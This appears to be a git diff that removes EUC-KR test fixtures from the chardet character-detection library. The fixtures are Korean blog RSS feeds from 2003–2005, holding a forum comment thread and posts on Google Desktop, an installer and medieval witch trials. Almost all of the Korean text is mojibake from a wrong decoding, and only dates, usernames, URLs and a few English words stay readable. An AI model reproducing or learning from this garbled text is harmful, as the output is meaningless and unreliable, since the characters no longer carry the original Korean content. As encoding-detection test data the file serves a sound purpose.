    -: ֵ©¸®½÷¸¶½÷¿¡ ¸ֲֳ±ג ְ§ַ״¼­ ִק¸®ֶ¼¸¦ ָס»‎ַ״¼­ °װְ׃ְ» ±גַׁ ³»¿¡ ¼±ְ ַ´¸י, ´ּµיְ÷ ¸ֳ»ְּ´.
    -±׳·¡, ³×µµ 12¿שְּ µַ¸י »ח¶קµיְּ °װְ׃ְ» ¸¹ְּ »ך´´ֲ °ֽ ֲכְ÷ ¾ָ´.
    -ֱַֿצ¸¸ ¸¹ְ÷ »ח¶קµיְּ ְֿ³ג ³»³» °װְ׃ְ» »ח´ֲ °ֽµµ »ח½ְַּ´.
    -µנ¾ֶ÷ם·־ 1ֶםְ÷ 1996³גְַ ֵ©¸®½÷¸¶½÷ ½ְֳוְ» ֵ¸ֱצ ¾¾ׂ´. ´ץ ְּ»ף ¹» »‎°¢ַֿ´ֲ°¡?
    -µנ¾ֶ÷ם·־´ֲ 3³גְּ³× ֱצ³µֱצ¸¸ '¾ֱֶקµµ' ÷£½÷ֶ® ¼¿·¯ ¸®½÷ֶ®¿¡ ְײ´.
    -»ח¶קµיְ÷ '¾נֱ¦³×' ְֱֱ÷ °װְ׃ְ» ¿רַׁ´.
    -³ָסµיְ÷ ¿ְ·£ ±ג°£µ¿¾ָ ÷¸ְוµָ ִק¸®ֶ¼¿ֽ ¸ם¼÷ְ»
    -ֲ×ְ÷ ±ג°£ְַ ¿ו½ְֹ¸·־ ֶק±גַֿ·ֱ°ם ַֿ´ֲ°¡?
    -±׳·¸´¸י, ¿כ»ךְַ ´‎ַ־ °װְ׃ ¹±¸´ֿ¿¡¼­ ÷¸ְ.
    (¿×ֱײ: ¿ר¹®ְ÷ ¡®See you in the bargain bin.¡¯)
    -
    -
    --------------------------------------------------------------------------------------
    -
    -<¾ֶ·¡ ±ְ÷ ְ­ ±¿¡ ´כַׁ µ¡±µי..>
    -
    -bard (2003-12-04 11:45:13)
    -
    -^^; ´¼ׂ °ת°ֱַֿצ¸¸ ְֱֱ÷ ±ְּ±÷¿ה.
    -
    -
    -bard (2003-12-04 11:46:43)
    -
    -ֱ₪¸» °װְ׃ַֿ´ֲ°ֹ ½ָ¾מַֿ´ֲ °װְ׃ ֱַ·־±׳·¡¸׃¸¦ °¡² ÷¼ ¶§¸¶´ '°װְ׃ ֱ¦ְ ָ₪ְ÷ °װְ׃ ֳַ·¹ְּ°¡ -ְֿ- ±׳ ְּ»ף ±׳ ְַּֿµµ ¾ֶ´ׁ »ח¶קְּ ְח¹ְּײ´ֲ ±׳¸®°ם ¿ֿ¼÷µµ ְײ´ֲ °װְ׃ְ» ¸¸µי¾מ ³¾ ¼צ ְײְ»±מ?' ¶ף´ֲ »‎°¢ְ» ַֿ°ן ֱַֿצ¿ה. -°װְּ¸׃¸¦ °ם¿כַ״¶ף- ¿ְַ÷ ¸»ְװ´ֿ´. :) ´¸¸ ³¹« °תַֿ¸י ¹®ֱ¦°¡ µַ°ֱצ¸¸¿ה. ^^;
    -
    -
    -Jupi (2003-12-04 11:56:00)
    -
    -¿¹ְ¿¡ ÷¸°ם´ֲ µ·־ ַֿµו¿¡ ÷¸°ְֱ־ ±......
    -
    -´כ÷־÷׀ ְח¹ּ¾ר´ֲ °װְ׃ְַ °ז¿ל ¾מ´ְֱ₪µµ ֳַ·¹ְּ °¡´ַֹֿ°װ µַ¸י ¹·־ ֳג½ֳµָ ְִֹּ½÷°¡ ¸¹ֱׂ.
    -¾מ´ְֱ₪µµ ֳַ·¹ְּ °¡´ַֹֿ°װ µָ »ףֲֵ¿¡¼­ '°װְ׃ְַ ְח¹ּ'¸¦ ְ§ַׁ ֵ׳½÷ֶ®°¡ ¸¹ְּ ַ¿הַֿ´°ם »‎°¢ַױ´ֿ´.
    -´¸¸...÷¸ֵכ ¾מ´ְֱ₪µµ ֳַ·¹ְּ °¡´ַֹֿ°װ...ַֿ´ֲ°ֽµµ ְֱֿ₪ְּ ÷‎½ֳ±ג ¶§¹®¿¡....±׳ »ףֲֵ¿¡¼­ ֳג½ֳµַ´ֲ °ז¿לµµ ֱ¾ֱ¾ ְײ½ְ´ֿ´¸¸...
    -µַµµ·ְּֿ¸י ¸¹ְ÷ °װְ׃µיְּ '°װְ׃ְַ ְח¹ּ'¸¦ ְ§ַׁ ֵ׳½÷ֶ®¸¦ ¸¹ְַּ״÷¸°ם ֳג½ְֳַ¸¸י ַֿ³׳¿ה....
    -
    -
    -µ¥´װ ְִֶ£ (2003-12-04 23:27:17)
    -
    -°װְ׃ְ» ½ָ¾מַֿ´ֲ °װְ׃ֱַ·־±׳·¡¸׃´ֲ;;
    -
    -(¾ֱֶקְ÷ ֱ¦°¡ ֱק¾קְ¼±¿¡ ¶¾מµיֱצ ¾¾ֶ¼­ ַצ½ַ¿¡ ´כַ״¼± ְ ¸נ¸£ֱצ¸¸..)
    -
    -¹«´ַֹׁ »ח¶ק¾ֶ´ׂ±מ¿ה?
    -
    -»‎¼±÷ס¸°³» ¶§¹®¿¡ »‎¼±ְ» °¡±מְּ ֱַֿצ ¸רַֿ´ֲ ְֿ½ֱִ‎ ֱײ¹זְוֱ₪µµ;;?
    -
    -
    -÷ך·חֶכ (2003-12-05 14:30:45)
    -
    -¹«´ַֹׁ °ֽ°ת´ֲ ´¶ף¿ה.
    -
    -
    -¹־½÷ (2003-12-05 15:18:43)
    -
    -°װְ׃ְ» ½ָ¾מַֿ´ֲ °װְ׃°³¹ְ....ְֿ¿¡ ´כַׁ ¿­ֱ₪ְּ ÷־ֱ·ַׂµם
    -
    -
    -÷½¼ַׂ³ (2003-12-05 17:04:13)
    -
    -°װְ׃ַֿ´ֲ°ְֽ» ³¹«ֱֱ¾ֶַֿ´ֲ °װְ׃°³¹ְ.. ְֿ¿¡ ´כַׁ ¿­ֱ₪ְּ ÷־ֱ·ַׂµם
    -
    -
    -µ¥´װ ְִֶ£ (2003-12-05 23:09:58)
    -
    -°װְ׃ַֿ´ֲ °ְֽ» ³¹« ֱֱ¾ֶַֿ¸י;; ¿­ֱ₪ְּ ³¹« ¿ְ¹µֹ°ֽ °°ְ½;;
    -
    -ֱצ³×ִ¡¸י ְְֿ» ±׳¸£ִ¡´ֲ ¹‎.
    -
    -
    -KingDND (2003-12-06 11:17:58)
    -
    -ֱצ´כ·־³׳..
    -
    -
    -LOG (2003-12-08 00:47:05)
    -
    -¸ֲ´ֲ ¸»ְּ±÷¿ה.
    -
    -
    -°ם°ז¼® (2003-12-10 08:48:48)
    -
    -°װְ׃ְ» ½ָ¾מַֿ´ֲ °³¹ְ´ֲ ¾רֱׂ...¹¹ ְְֲּּ µ·ְּ µָ´°ם
    -ֱַֿצ¸¸,°װְ׃¸¸µי´÷¸¸י °װְ׃ַׂ½ֳ°£µµ ¾ר°ם ±ֲֽת¾ֱֶצ±גµµ ַױ´ֿ´
    -±׳·¸°װ ½ֳ°£ְּ °¡¸י ְֿ¹ °װְּ¸׃÷¸´ ָ־¾ְ °װְ׃ ֱ¢ַׂ±גָ¸°¡ ¾ר¾מ ֱ‎´ֿ´
    -±׳¸®°ם ³×ְּ°¡ µי¸י ±׳·¸°װ °װְ׃ַֿ´ֲ°ֽ¿¡ ¿­ֱ₪ְְ־°װ ½ְִ»¼צµµ ְײ½ְ´ֿ´
    -ֱַֿצ¸¸ ±׳¶§´ֲ °װְ׃ְ» ´¼רָק ֱֱ¾ֶַ״¼­ ְַֿֿ´ֲ ֲֵµµ°¡ ¾ֶ´ֿ¶ף
    -ְֱ¸½ֹ³»ֱצ,³²µי÷¸´ ±¦ֲתְ÷ °װְ׃ְ» °³¹ַ״¾°´´ֲ ֲֵµµ°¡ »‎±ג´ֲ°ֵ °°½ְ´ֿ´
    -ֱ¦°¡ ±׳·¸°ֵµח¿ה
    -¸»¾¸µו¸®°ם ½ְֽ÷°ַµ¥,°װְ׃ ֳַ·¹ְּ¸¦ ֱֱ¾ֶַֿ°ם ֱ₪¸»°װְ׃ְ» ַֿ°ם½ֽ´¸י
    -°³¹ְ÷¸´ ´¸¥°ֹ·־ µ·¹ר´ְ½ ֶםַֿ°װ °װְ׃ַֿ´ֲ°װ ´ץ ±¦ֲתְ÷°ֵ °°¾ֶ¿ה
    -ֳַ·¹ְּ¸¦ ַ״µµ ¸¾ֶםַֿ°װ ¸רַױ´ֿ´...
    -"¾ֶ¾¾ ְּ°ַ ֱ׳ְּ°װ ַ״³ש³׳........ְּ°ֵ ¾מ¶»°װ ֱַצ?"ְּ·±»‎°¢ְּ ¸ױְת µו´ֿ±מ..
    -
    -
    -biscuit (2003-12-11 15:14:51)
    -
    -°װְ׃ְ» ¾ַָֿ´ר ¼­¹צֱַ·־±׳·¡¸׃°¡ °װְ׃ְ» ַֿ°װ µַ´ֲ °ז¿ל´ֲ ÷ֳ¾מ¿ה. (¶ףֱצ¸¸ ִ³ֱך¾ף°װְ׃ְּ¾תְ¸´ֿ±מ ±׳³ֹ ¶ףְֶּ® ְ¯ְת..ֱ₪µµ°±÷¿ה.)
    -
    -
    -gunu (2003-12-16 12:41:57)
    -
    -ְֱֱ÷ ±ְּ·־±÷¿ה. ³×» °װְ׃µיְּ ¿ײ ³×¿ְ´ֱֲצ´ֲ ְתµµ »ף´חָק ±ֳ±ַ״ַֿ´ר °ְֽװ´ֿ´^^
    -
    - - ]]> -
    - ¹ּ÷׀·ש - Fri, 22 Jul 2005 04:46:07 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/siwoo.org.xml b/chardet/tests/EUC-KR/siwoo.org.xml deleted file mode 100644 index 3d83377..0000000 --- a/chardet/tests/EUC-KR/siwoo.org.xml +++ /dev/null @@ -1,285 +0,0 @@ - - - - -siwoo memory archives -http://siwoo.org/tt/index.php -[½ֳ¿ל.±ג¾ן.÷¸°¼ׂ] -ko -Mon, 24 Oct 2005 17:21:48 +0900 - -Google 2084ְַ µ־·ֱ¿ע -http://siwoo.org/tt/index.php?pl=182 -

    -
    -´÷¿וֵ¸ְ׃ֱמ°¡ ¼ׂ°³ַׁ Randy Siegelְַ ְַׁוֲ¥¸® op-artְּ¹ֱּצ°¡
    -ֲ ¹«¼·³׳.
    -
    -- ³ְַ µ־³ת
    -- ³ְַ ְµי
    -- ְ§¼÷»חֱרְ¸·־ ֳִָֹ÷¸°ם ½ְֽ÷ »ח¶קµי..
    -- ְ§¼÷»חֱרְ¸·־ ³×¸¦ ÷¸°םְײ´ֲ »ח¶קµי..
    -- ³ְַ °ת°ֵ
    -- ³ְַ ַצְח
    -- ³ְַ ¹ּ·¡
    -
    -ְּ·± °ֽµיְ» ¾ֶ¹«·± °ֵ¸®³¦ ¾רְּ »ח¿כַׂ ¿ל¸®µי°ת ¿ל¸®µי ִָ¼ױְַ
    -¹ּ·¡°¡, ±׳ ´‎´‎ַׁ ¹ּ·¡ְַ ְ־ֵֽ³ ¼¼»ףְּ.
    -
    -¹«¼·³׳.]]>
    -web - Web Column -siwoo -Mon, 24 Oct 2005 17:12:59 +0900 -
    - -[µ¥½÷ֵ©ֵ¾ °ֻ»צ] Gogle Desktop Version 2 Beta -http://siwoo.org/tt/index.php?pl=181 -

    -
    -ְְִֶֿ» ְ¼÷ַֿ°ם ¹צ¸®ֱצ ¾´ֲ ½ְ¼÷(?)ְ» °¡ֱצ°ם ְײ´¸י µ¥½÷ֶ®ֵ¾
    -°ֻ»צְּ ¾ף¸¶³× ַ¿הֱַׁצ ֱ¾ֱ¾ ´ְ³¥¶§°¡ ְײ½ְ´ֿ´.
    -
    -±¸± µ¥½÷ֶ®ֵ¾ ¼­ִ¡ 1¹צְְ» ¼³ִ¡ַֿ°ם ַא¿©³× ַ¿הַֿ°¾מ~ ַֿ°ם
    -»טֱ¦ַֿ·ֱ´ ±׳³ֹ ³צµ־°ם ְֲַׁ» ±׳³ֹ ֱצ³»´°¡ ַ¿הַׁ ¹®¼­³×
    -ְּ¸ְְַֿ ³»¿כְ» ¼ר½ִ°£¿¡ °ֻ»צַ״ֱײ´ֲ 'ִ£ְ‎ַׁ ±¸±¾¾'¸¦ ´ְ³¢°ם
    -±׳³ֹ ְת³ֹ ְ ¾²°ם ְײ´ֲµ¥ ¹צְ2 ÷£ֵ¸°¡ ³×¿װ³׳¿ה.
    -
    -http://desktop.google.com/?promo=mp-gds-v1-1
    -
    -¾ֱֶק ÷£ֵ¸¹צְְּ¶ף ¿µ¹®¸¸ ³×¿ֽ ְײֱצ¸¸ ַׁ±µµ µַ´ֲ °ֽ °°½ְ´ֿ´.
    -ֱַֿצ¸¸ ¿µ¹®ְּ°ם ÷£ֵ¸¹צְְּ¶ף ְֿ´ »טֱ¦ַ½ְ´ֿ´. ַׁ± ֱ₪¹ְֶַּ
    -³×¿ֳ¶§±מֱצ ±ג´·ֱ¾ֱׂ.
    -
    -ְב±ס ¼³ִ¡ַֿ°ם »לֶל÷¸´ֿ ¾ֶ..±¸±¾¾, ¿¥¿¡¾²¾¾¶ ¾ִָ¾¾ ¾א¿ְ¸£´ֲ
    -ִ£ְ‎ַׁ ±ג´ְֹּ ְ¶א ֳ°¡ µַ¾ת³׳¿ה. ±׳ֱ¿¡µµ ְ§¿¡ ÷¸½ֳ´ֲ ¹¿ֽ °°ְּ
    -'»חְּµו¹'±ג´ְֹ÷ ֱ₪¸» ³מ¶ר½ְ´ֿ´. ֶ¯ָק ¿הֱע°°ְּ ¿ְּֽµו ָ­¸יְ»
    -¸¹ְּ ¾²´ֲ ִִַ»ֵֽ¶ף¸י ±׳ ³׀ְ÷ °ר°£ְַ »חְּµו¿¡ ´÷½÷, ¸¸נְו, RSS,
    -¸ְֿ, ³¯¾¾, »חֱר, ֱײ½ִ µמµמ...¿ה¸®ֱ¶¸® ַ¿הַׁ ±ג´ֹ °¡µזַׁ ³»¿כְַ
    -»חְּµו¹...ְ½..²ֿ ±¦ֲתְ» °ֽ °°±גµµ ַֿ±¸¿ה..
    -
    -¾מֲ·µח ֱ¿הַׁ °ְֽ÷ µ¥½÷ֵ© ֵ¾ ¼­ִ¡ ±ג´ְַֹ ¾ק±׳·¹ְּµו´ֲ ¾ֱֶק ָ®ְ־
    -ַ״÷¸ֱצ ¾¾ֱׂצ¸¸ °ֽµµ ±ג´·ֱ ÷¼¸¸ ַֿ°³׳¿ה.
    -
    -ַׁ± ֱ₪½ְִֶַ» ±ג´·ֱ ÷¾´ֿ´.]]>
    -program -siwoo -Tue, 23 Aug 2005 15:15:25 +0900 -
    - -½־ְּ¿שµו ¹ּ´ֿ¸µ, ְּ±·ח½÷ °¡µח -http://siwoo.org/tt/index.php?pl=180 -

    -
    ְּ±·ח½÷ °¡µח ¼­÷ס½÷

    -
    -

    -
    ½־ְּ¿שµו ¹ּ´ֿ¸µ ¼­÷ס½÷

    -
    -¾ף¸¶ְ¿¡ ְּ±·ח½÷ °¡µח ÷£ֵ¸ ¼­÷ס½÷¸¦ ַֿ°ם ְײְ» ¶§ ְב±סְַ
    -±ְ» ¿ֳ·ֱָצ¸¸
    -
    -[°·ֳ ± ÷¸±ג]
    -
    -¸׃.. ְֱּ¦ ½־ְּ¿שµו±מֱצ ְּ ¼­÷ס½÷¸¦ ֲק¿כ ַֿ´ֲ °ֹ ÷¸´ֿ
    -¼­÷ס½÷ ִ«ַַ¶ף´ֲ ¸»±מֱצ´ֲ ַֿ°ם ½ֱֽצ ¾´.
    -
    -¼ׂ¼ָ ³׳ֶ®¿צֵ©¸¦ ¾מ´ְ ַׁ ÷־÷׀ְּ¶ףµµ ±¸¼÷ַֿ¿© ¼­÷ס½÷ַֿ°ם ְײ´ֲ
    -ִ¿¹ֲ´ֶֿ¼¿¡¼­ ְּ·¯ַׁ ¸סְ°ת °°ט¸¦ ¼³ֱ₪ַׁ ¼­÷ס½÷´ֲ °¡´ַֹֿ´°ם
    -¹ֿ°ם ½ֽ¾מֱר´.
    -
    -ְ½... ±׳·¡µµ ַ׳»ף ±ג´כ¸¦ ַֿ°ם ¶ׁ²±ְ» ¿­¾מ÷¸¸י ¾מµנ¼±°¡ ÷»µםַׁ
    -´ְ³¦ְּ '¾ָ'µי°ם ְ־»חְֶּ®ַׁ ´ְ³¦ְּ ³×´ֲ ¼­÷ס½÷´ֲ ֱ₪³ח ָµי±מ?
    -¸¶ִ¡ ֳ³ְ½ְַ ½־ְּ¿שµו ½ְֳ°ת ÷ם·־±׳ְַ ½ְֳ¿¡¼­ ´ְ³₪ ±׳·±
    -ְ־»חְֶּ®ַׁ ´ְ³¦µיְּ ±׳¸³´.
    -
    -±׳¸®¿מ °ְֽ» ֳ¾ןַֿ´ֲ °ְַֽ ֱרַא¹זַגְ÷ ַצְח¸¦ ´ְ³¢´ֲ »ח¶קµיְַ
    -¸עְּ´ ₪ׁ ₪ׁ?]]>
    -web - Web Column -siwoo -Fri, 05 Aug 2005 11:09:50 +0900 -
    - -ְֿ¿הְֿ ´÷½÷¸¦ ÷¸°ם ֳ³ְ½ ´ְ³₪ °ֽ. -http://siwoo.org/tt/index.php?pl=179 - -
    -1. ¹÷°¡ ±םְ÷ ½ֹ¸®ְְ־ ½ֳ³×¸®¿ְ°¡ ¼ְ÷ »ח°ְַּ´.
    -2. ¾מµנ¼±°¡ ÷» µםַׁ ְו¸יְּ´.
    -
    -2¹רְַ '¾מµנ¼±°¡ ÷» µםַׁ' ְו¸יְ÷ ֳ¹¹רֲ°·־ °װְ׃ְּ ¶°¿ֳ¶ת´.
    -
    -ְְֿ־ִ× ½ֱֳ¡ְַ ¾׳¼ַ °װְ׃¿¡¼­ ¼צ¸¹ְ÷ ¹«±ג·־ ¹«ְוַֿ°ם ֱ¼ְ÷ ÷¹µµ¿ֽ
    -¿©·¯ ¾מµ־¿מ ¹זְ» °ִֵ¡¸י¼­ ´«¾ױ¿¡ ÷¸ְּ´ֲ °ְֽ÷ ְְּµח ¹¹µחֱצ ´
    -½ק¹צ¸®°ם ֶרִֶַ״¹צ¸®´ֲ ְו¸יְ÷ ְּ¹ּ ְֽ¼קַׁ °ְּֽ´.
    -
    -¾ֶ´ֿ³× ´¸¦±מ ¿ְ´ֳ ´÷½÷¸¦ ÷¸´ֿ ÷ס½ֱַׁ ´÷½÷°¡ ³×¿װ´.
    -
    -ֳׁ±ג³­»ח ְֿׁׁ÷´ְ÷ '°װְ׃±₪'
    -
    -ֱ» °´°ְְֱּצ ¸רַׁ ±ג»חְַ ³»¿כ°ת ֱ¦¸ס°°ֱצ¸¸ ¾מֲ·µח ¾מֱ¦ ³»°¡
    -´ְ²¼´ר ±׳ ְְֱּ, ¸¸ְֿ ֱ₪¸»·־ ¼ר°£ְַ ֲר°¢ְ¸·־ °װְ׃°ת ָ¥µ¿ַֿ¿©
    -±׳·¨´¸י(´¼רַׁ ָ¥µ¿ְ÷ ¾ֶ´ֿ°ֱצ¸¸) ֱ₪¸»·־ ¹«¼­¿מ ַצ½ְַּ´.
    -
    -»ח½ַ ³×µµ °¡² ±׳·± ְְ־ַׁ °װְ׃ְ» ½÷½÷·³ ¾רְּ ֱס±ג°ם ְײְ¸´ֿ ¸»ְּ´.
    -
    -±׳¸®°ם µ־¹רֲ°·־ »‎°¢³×´ֲ ְו¸יְ÷ ±ט±ג´צ °¨µ¶ְַ ¿µָ­ 'ַ״¾ָ¼±'ְַ
    -¿©·¯ ֱִ¼ֱµיְּ´. ±÷´כ¶ף´ֲ ֶף¼גְְ־ °ר°£ְ» ¹«´כ·־ ¹ת¾מֱצ´ֲ
    -ְֿ»ף ¼׃¿¡¼­ ¼­¼­ָק µי¾מ³×´ֲ ְ‏ְ÷ְּµיְַ ½ֹ¸®ְ ÷´ֶף°¨.
    -
    -¼­´ֳַֿ°װ ¿¹°םµָ ±׳ ְ»ףµיְ» ¿ל¸®´ֲ ¾מ¶»°װ ¹¾ֶµיְּ°ם ְײְ»±מ?]]>
    -feel-post -siwoo -Mon, 20 Jun 2005 10:49:55 +0900 -
    - -¸¶³א »ח³ְַֹ ±ג¿ר -http://siwoo.org/tt/index.php?pl=178 - -±׳ ÷־÷׀ ¾נ±ְ÷ ¸¹ְ÷ »ח¶קµיְּ ַֿ°ם ְײ¾מ¼­ ֱַֿצ ¾±ג·־ ַֿ°ם
    -±¸±ְ» ֵכַֿ¿© ±׳ ÷»ֱת¿¡ ´כַׁ ÷־÷׀ְ» ַׁ¹ר »לֶל ÷¸±ג·־ ַ´.
    -
    -http://ynucc.yeungnam.ac.kr/~history/matermed12.html
    -
    -
    ¸¶³א»ח³ֹ
    -
    -¡¼ »ח¶קְ÷ ֱ¾±³ְ ½ֵ³ה¿¡ µ¶ף ַאַׂ ¶§¸¸ֵ­ ±ג»°ם ¿כ°¨ַֿ°ם
    -ֳ¶ְתַֿ°װ ¾ְַ» ַאַֿ´ֲ ְְֿ÷ ¾ר´¡½ִֶ½÷ִ®,ֶ־¼¼
    -
    - ¸¶³א¶ץ?¡²¾מ¸°ְְַּ ַַ¸¦ ÷´ֲ ְ, ¶ף¹ּ¾ֶ: lamia, ֱ¡ְוְּ·־¼­
    -µנ÷ס³×ֵה¸£, ¼ײֶ¿·¹±¸½÷: divinator, soltiegus, ÷רְ·ח³× ֱצֶ־ְּ¸¦
    -ֵ¸°ם ַֿ´ְֳ» ³×´ֲ ¹ֵ©³×¸®¾ֶ: bacnaria)
    -
    -1400³ג°ז÷־ֵֽ ½ְֳµַ¾מ 1600³גְ» ֱ½ְֹ¸·־ ַֿ´ֲ ְֿ¼¼±ג µ¿¾ְָ÷
    -¹·־'¸¶³א¼±ַ³'ְַ ±ג°£ְּ¾ת´.
    -
    -ְּ ±ג°£ְ» ְ‎ֱ₪ְ¸·־ ַֿ´ֲ ¸¶³א ¼±ַ³ְ÷ 13¼¼±ג ¹«·ֶ¿¡ ֱַ¶½÷¿¡¼­
    -÷ׂ±ג ½ְֳַֿ¿© °ב±¹ ¸נµח ±׳¸®½÷µµ±³ ±¹°¡, ֱן ¼­ְ¯·´ ְ¿×ְ»
    -ָ²ֶףָ­½ֳֵ°°ם 17¼¼±ג ¸»¿¡ ±׳ ¿© ִֶ°¡ ½ֵ´כ·ת ¾ֶ¸¸®ִ«¿¡ ֱֶר ִָ
    -±¼׃ַֿ°װ ֱרֱ₪µַ¾ת´. ¼צ¸¸, ¼צ½¸¸ְַ ¸¶³א°¡ ±³»ל´חַֿ°ם, ָ₪ְ÷
    -±³»ל´חַׁ ִָ¿¡ ÷ֲֵׂ¿צֱצ°ם, ¶ַ ´ֲ »ל¾ְֶײ´ֲ ֳ₪·־ ÷ֲֵׂ¿צֱ® ֱ׳¾ת´.
    -1590³ג¿¡ µ¶ְְֿ» ¿©ַאַ´ר ¿©ַאְ´ֲ ְ°ם ְײ´. ֱ¦³׳¹¿¡¼­´ֲ
    -3°³¿ש µ¿¾ָ 5¹י¸ם(1513³ג),ֶ® ·¹ְּ÷ךֱמ(µ¶ְֿ)¿¡¼­´ֲ 7ֳµ¸םְּ
    -¹°ֲֵ¿צֱר ֵ¿¿¡ µ־ °³ְַ ¸¶ְ»ְּ ְ¸ךµַ°ם, ´¸¥ µ־ °³ ¸¶ְ»¿¡¼­´ֲ
    -¿©ְ 2¸ם¸¸ְּ »ל¾ֶ ³²¾ְׂ» »׃ְּ´.(1580³ג). ְ¼¾¿¡¼­´ֲ ַֿ·ח
    -»חְּ¿¡ 1¹י 33¸ם(1589³ג), ¾ֻ»ח½÷ְַ ¸¶ְ» »ף ¾ֶ¶ף¸¸¿¡¼­´ֲ 1³ג µ¿¾ָ
    -2¹י¸ם ְּ»ף(1596³ג), ¶ף÷־¸£¿¡¼­´ֲ 4°³¿ש µ¿¾ָ 6¹י¸ם(1609³ג),
    -½÷ֶ®¶ף½÷÷־¸£ֵ©¿¡¼­´ֲ 5ֳµ¸ם(1615¡­55³ג), ÷¸£ֳק÷־¸£ֵ©¿¡°ֵ´ֲ
    -8¹י¸ם, ¹ד÷£¸£ֵ©¿¡¼­´ֲ 1ֳµ 5¹י ¸ם..ְּ·¯ַׁ ¸¶³א¼±ַ³ְַ ֶ¯ְַּׁ
    -ֱ¡ְ÷ ַױ¸®ֱײְַ¿ֽ ָ¸׃´ֱֿעְ» ַ¥¹זַׁ ¸£³׳»ף½÷ְַ ֳײְ¼÷±ג¿¡
    -ָײ¸פ¾ֳֶֶ´´ֲ °ֽ, ְּ ¼±ַ³ְַ ¼±µ־ֱײְ¿´ ´ר ְּµיְּ ±³ָ², ±¹¿ױ,
    -±ֱֽ·, ´ח´כְַ ְֿ·שְַ ´כַ׀ְ, ְחֶַ°, ¹®ָ­ְ־ְּ¾ת´´ֲ °ֽ, ¸¶³אְַ
    -ֱ¸ְח°¡ ¿¾÷־ֵֽ ֱ¸ְחַ״¿װְ½¿¡µµ ÷ׂ±¸ַֿ°ם ±³ָ¸¿ֽ ±¹°¡ ±׳¸®°ם °רְ
    -±ְַ§¿ֽ ±ַ·ֲµיְּ ְ±¹ְְ־ ֱ¶ֱק¸ְֱ» µׁ·¯ִ§ְ¸·־½ב ַאַ״ֱ³´´ֲ °ֽ,

    -1600³גְ» ְ‎ֱ₪ַֿ´ֲ ַֿ´ֲ ְִָ 3, 4¼¼±ג µ¿¾ָ¿¡ ֱַׁ₪µָ´´ֲ °ֽµמְּ´.
    -
    -ֱ·«...
    -
    -±׳·³ ¸¶³אְחְֶַ÷ ¾מ¶² ½ְִ¸·־ ְּ·ח¾מֱ³ְ»±מ?
    -
    -
    -¥¡. ֳ¼ֶק ¡₪´©±÷°¡°¡ ¾מ¶²ְְַ ְּ´ֱֻ¸¦ ְחֶַ°¿¡°װ °ם¹ַֿ°ם
    -±׳ ֱֻ¸¦ ְװֱץַׂ °ְֽ» ְֳ»ַׁ °ז¿ל
    -
    -¡₪ ´©±÷°¡°¡ ¾מ¶²ְְַ ְּ´ֱֻ¸¦ °ם¹ְ÷ ֱַצ¸¸, ±׳ ֱֻ¸¦ ְװֱץַֿ°ֵ³×
    -±׳ »ח°ַ¿¡ °°טַֿ´ֲ °ְֽ÷ ¿רֱַֿצ ¾´ֲ °ז¿ל
    -
    -¡₪ °ם¹µµ ¹׀°םµµ ¾רֱצ¸¸ ¾מ¶²ְְַ ְּ´¿¡ ´כַ״¼­ '¼¼»ףְַ ¼ׂ¹®'ְּ
    -ְײ´ֲ °ז¿ל
    -
    -'¼¼»ףְַ ¼ׂ¹®'ְ÷ ¿כְְַ¸¦ ֳ¼ֶקַֿ´ֲ ְ¯·ֲַׁ ±°ֵ°¡ µַ¾ת´.
    -
    -¥¢. ¹׀°ם ½ֹ¹®±װֱ₪ְַ ְַַֿ¸י 14¼¼ ְּ»ףְַ ³²ְ, 12¼¼ ְּ»ףְַ
    -¿©ְ¿¡°װ´ֲ ְּ´ְ» ¹׀°םַׂ ְַ¹«°¡ ְײ´.
    -
    -ְּ ְַ¹«¸¦ °װְ»¸® ַֿ´ֲ °ְֽ÷ '°£ֱ¢ְ ְּ´'ְּ¾ת´. ¸¶³אְחְֶַַ
    -±ג·ֿ¿¡ ÷־¸נְ½ִ, ÷־÷־, ֱַ¦, »חֱ¦, ֱײֱ¾ְּ ¼­·־ ¹׀°םַֿ´ֲ ¿¹°¡
    -¸¹ְּ ÷¸ְ־´
    -
    -iii. ְ¼צ ½ֱַ¦·־ ³×°¡ ְ¼צַֿ´ֲ ¿¹´ֲ ±״ָק ְ¾ת´. '¸צְַ °ב¹י'ְּ
    -¸ם¹יָק ¹אַפֱצ¸®¶ף´ֲ ָס¸ְֱּ ¾ר´´ֲ °ְֽ» ³¹«³× ְ ¾ֻ°ם ְײ ¾ת±ג
    -¶§¹®ְּ´.
    -
    -¥₪. ֵץ¿ֱ ֳ¼ֶקµָ ¿כְְַ´ֲ ±׳´כ·־ °¨¿ֱ¿¡ ³ײ¾מֱר´.°¨¿ְֱַ °םֵכְ÷
    -ְ¹יְ» °­¿הַֿ±ג ְ§ַׁ ְֱֿ¾ְַ °ם¹®ְּ¾ת´. ַַ°םµיְ÷ ַ׳»ף °ם¹®ְַ
    -°רֶק¿ֽ µ¿°ֵַֿ¿´´.
    -
    -¥¥. ְח»ך¼צ»צ ¿כְְְַַ ֳ¼·־, ֵץ¿ֱ°ת µ¿½ֳ¿¡ ְח»ך°¸® °ר¹«¿ר°ת
    -°רֱץְ־ְ÷ ¿כְְְַַ ֱ‎ְ» ¹ז¹®ַֿ¿© ±׳ µ¿»ך, ÷־µ¿»ך, ֳ₪±ַ, ֳ₪ ¹«¸¦
    -»ף¼¼ָק ֱ¡°ַֻֿ¿© ±ג·ֿ¿¡ ³²±ה´. ְּ°ְֽ÷ ְח»ך¸פ¼צ¸¦ ְ§ַׁ ֱ״÷סְּ´.
    -ְּ´ְַ ÷»ֱת°ת´ֲ °°ט¾רְּ ְּ ְח»ך¸פ¼צ°¡ ¸¶³אְחְֶַַ ½ֱַתְ
    -ְְּ¯¿´´ַ״µµ ¹«¹זַֿ´.
    -
    -¥¦. ֱץ¾נ ¡₪ַַ°ם¿¡°װ ÷ׂ¸®ַׁ ֱץ¾נְ» ַאַֿ´ֲ °ז¿ל¿¡ ַַׁ״ ֱץְ־ְ¸·־
    -ְ־ֱ₪ַׁ´. ¸¶³אµµ ´¸¥ ¸¶³אְַ ֱֻ¸¦ ֱץ¾נַׂ ¼צ ְײ´.
    -
    -¡₪¸¶³אְַ ֱֻ¿¡ ´כַ״¼­´ֲ ¸נµח ֱ¾·שְַ ְ־°£ְּ ֱץְ־ְ¸·־ ְ־ֱ₪µָ´
    -
    -¡₪ »חֳב±ג(³² 14¼¼, ¿© 12¼¼)°¡ ¾ָµָ ¾מ¸°ְְַּ ֱץ¾נµµ ¹טֳ´ַ״¼­´ֲ
    -¾ָµָ´.
    -
